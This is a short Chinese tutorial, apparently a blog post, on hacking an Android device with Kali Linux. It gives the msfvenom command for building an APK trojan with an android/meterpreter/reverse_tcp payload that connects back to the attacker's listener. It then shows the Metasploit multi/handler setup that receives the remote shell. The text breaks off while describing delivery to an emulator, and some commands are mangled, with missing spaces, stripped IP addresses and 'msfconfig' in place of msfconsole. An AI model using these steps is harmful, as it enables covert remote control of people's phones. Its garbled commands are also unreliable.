一、需要的软件
Kali2.0(系统自带msfVENOM、metasploit、msfconfig)安卓手机,安卓虚拟机查看自己的IP,..52.
二、入侵过程
使用msfvenom生成apk木马
解释:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线
用到命令:msfvenom-pandroid/meterpreter/reverse_tcpLHOST=..1.LPORT=R/test/newbie.apk
P攻击payload
LHOST=接收反弹连接主机
LPORT=接收反弹连接主机的监听端口
然后是路径生成路径
生成pp.apk木马,下一步要放到安卓系统中去。
三、
启动metasploit
依次执行输入msfconfig
useexploit/multi/handler加载攻击模块
setpayloadandroid/meterpreter/reverse_tcp选择要使用的Payload
输入useexploit/multi/handler后,出现下图
设置LHOST/LPORT/
输入run-j,就开始攻击了。
四、开启安卓模拟器
在安卓模拟器浏览器上输入